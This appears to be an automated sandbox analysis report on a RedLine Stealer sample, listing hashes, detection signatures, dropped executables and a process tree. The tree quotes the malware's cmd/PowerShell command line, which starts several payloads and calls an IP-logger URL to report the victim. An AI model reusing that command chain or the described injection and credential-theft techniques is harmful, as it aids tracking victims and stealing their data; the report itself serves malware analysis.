Analysis
max time kernel: 146s
max time network: 146s
platform: windows7_x64
resource: win7v20201028
submitted: 21-03-2021 12:01

Static task: static1

Behavioral task: behavioral1
  Sample: 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
  Resource: win7v20201028

Behavioral task: behavioral2
  Sample: 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
  Resource: win10v20201028
General
Target: 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
Size: 1.1MB
MD5: f5366963764901262499c8021333f986
SHA1: e57b794220e7a6184614ccd4a6ddcf99de7e0717
SHA256: 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f
SHA512: 84cde9fd4846e839fee7171546c76253c321af4bc619e2b0b4830077b9d966251e36217f60c6da6c31258770fbf71284a1896a7bc5b388c609ebf18be9c048d6
Malware Config
Signatures
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (3 IoCs)
  resource | yara_rule
  behavioral1/memory/928-73-0x0000000000400000-0x0000000000428000-memory.dmp | family_redline
  behavioral1/memory/928-74-0x0000000000421DFE-mapping.dmp | family_redline
  behavioral1/memory/928-77-0x0000000000400000-0x0000000000428000-memory.dmp | family_redline

Blocklisted process makes network request (2 IoCs)
  flow | pid | process
  5 | 1412 | powershell.exe
  8 | 1412 | powershell.exe

Executes dropped EXE (7 IoCs)
  pid | process
  1484 | hello_C# (2).exe
  1968 | hello_C#.exe
  1784 | jayson.exe
  1704 | riv.exe
  1292 | jayson.exe
  1604 | jayson.exe
  928 | jayson.exe

Loads dropped DLL (9 IoCs)
  pid | process
  1152 | 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
  2036 | cmd.exe
  2036 | cmd.exe
  2036 | cmd.exe
  2036 | cmd.exe
  2036 | cmd.exe
  1784 | jayson.exe
  1784 | jayson.exe
  1784 | jayson.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Suspicious use of SetThreadContext (1 IoCs)
  description | pid | process | target process
  PID 1784 set thread context of 928 | 1784 | jayson.exe | jayson.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid | process
  1412 | powershell.exe
  1412 | powershell.exe
  1784 | jayson.exe
  1784 | jayson.exe
  1784 | jayson.exe
  1784 | jayson.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 1412 | powershell.exe
  Token: SeDebugPrivilege | 1784 | jayson.exe
  Token: SeDebugPrivilege | 928 | jayson.exe

Suspicious use of WriteProcessMemory (41 IoCs)
Identical rows are collapsed; the count column gives the number of times each row appeared.
  description | pid | process | target process | count
  PID 1152 wrote to memory of 2036 | 1152 | 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe | cmd.exe | 4
  PID 2036 wrote to memory of 1484 | 2036 | cmd.exe | hello_C# (2).exe | 4
  PID 2036 wrote to memory of 1968 | 2036 | cmd.exe | hello_C#.exe | 4
  PID 2036 wrote to memory of 1784 | 2036 | cmd.exe | jayson.exe | 4
  PID 2036 wrote to memory of 1704 | 2036 | cmd.exe | riv.exe | 4
  PID 2036 wrote to memory of 1412 | 2036 | cmd.exe | powershell.exe | 4
  PID 1784 wrote to memory of 1292 | 1784 | jayson.exe | jayson.exe | 4
  PID 1784 wrote to memory of 1604 | 1784 | jayson.exe | jayson.exe | 4
  PID 1784 wrote to memory of 928 | 1784 | jayson.exe | jayson.exe | 9
Processes
Process tree from behavioral1; the number before each entry is its depth in the tree.

1. C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe"
   PID: 1152
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory

  2. C:\Windows\SysWOW64\cmd.exe
     Command line: "cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "jayson.exe" & start "" "riv.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
     PID: 2036
     - Loads dropped DLL
     - Suspicious use of WriteProcessMemory

    3. C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe
       Command line: "hello_C# (2).exe"
       PID: 1484
       - Executes dropped EXE

    3. C:\Users\Admin\AppData\Local\Temp\hello_C#.exe
       Command line: "hello_C#.exe"
       PID: 1968
       - Executes dropped EXE

    3. C:\Users\Admin\AppData\Local\Temp\jayson.exe
       Command line: "jayson.exe"
       PID: 1784
       - Executes dropped EXE
       - Loads dropped DLL
       - Suspicious use of SetThreadContext
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious use of WriteProcessMemory

      4. C:\Users\Admin\AppData\Local\Temp\jayson.exe
         Command line: "{path}"
         PID: 1292
         - Executes dropped EXE

      4. C:\Users\Admin\AppData\Local\Temp\jayson.exe
         Command line: "{path}"
         PID: 1604
         - Executes dropped EXE

      4. C:\Users\Admin\AppData\Local\Temp\jayson.exe
         Command line: "{path}"
         PID: 928
         - Executes dropped EXE
         - Suspicious use of AdjustPrivilegeToken

    3. C:\Users\Admin\AppData\Local\Temp\riv.exe
       Command line: "riv.exe"
       PID: 1704
       - Executes dropped EXE

    3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
       Command line: powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
       PID: 1412
       - Blocklisted process makes network request
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
20 download entries were recorded; entries with identical hashes are collapsed, with the number of times each appeared.

File 1 (6 entries)
  MD5: d6b9f530e7e8ddebea8069a0d94ad38e
  SHA1: 28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
  SHA256: 3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
  SHA512: 2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

File 2 (9 entries)
  MD5: 68f70e9545a6dbeecd3e2eba38c197ca
  SHA1: 5d0fdc7452e3af1c4d7b145256888687e5fd2a72
  SHA256: a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
  SHA512: 99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

File 3 (4 entries)
  MD5: bd96d90751fd507c3af0edbe0d596ec4
  SHA1: eed0bb7626d328190c7de701c0071f9c4ad048ef
  SHA256: f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
  SHA512: 5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

File 4 (1 entry)
  MD5: 293165db1e46070410b4209519e67494
  SHA1: 777b96a4f74b6c34d43a4e7c7e656757d1c97f01
  SHA256: 49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
  SHA512: 97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19